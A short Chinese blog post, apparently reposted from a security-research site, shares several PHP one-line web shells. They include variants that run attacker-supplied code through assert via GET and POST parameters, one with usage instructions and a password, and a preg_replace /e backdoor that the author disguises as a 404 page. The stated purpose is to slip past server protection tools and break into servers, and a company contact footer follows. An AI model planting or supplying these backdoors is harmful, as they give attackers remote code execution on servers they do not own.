群里一基友发了个变异一句话,代码:
1
2
3
4
|
<?php
$soft = (string)key($_GET);
$soft($_POST[‘assert’]);
?>
|
看了下,不错。
另外一基友给出:<?php $_GET[‘123’]($_POST[‘456’]);?>文件名?123=assert 密码456
都是很给力的一句话啊。
哥心里也痒痒的,于是自己就试着搞一句话。
核心代码如下:
1
|
@preg_replace(“/[email]/e”,$_POST[‘h’],“error”);
|
然后扩展,最终哥把他弄成404一句话。
直接图:
现在服务器上的神马安全狗,D盾,守护神各种神器,搞得我等菜鸟,有孔难入
只好自己打造自己的马,来射进服务器!
本文转自ydmjj(ysbin)博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号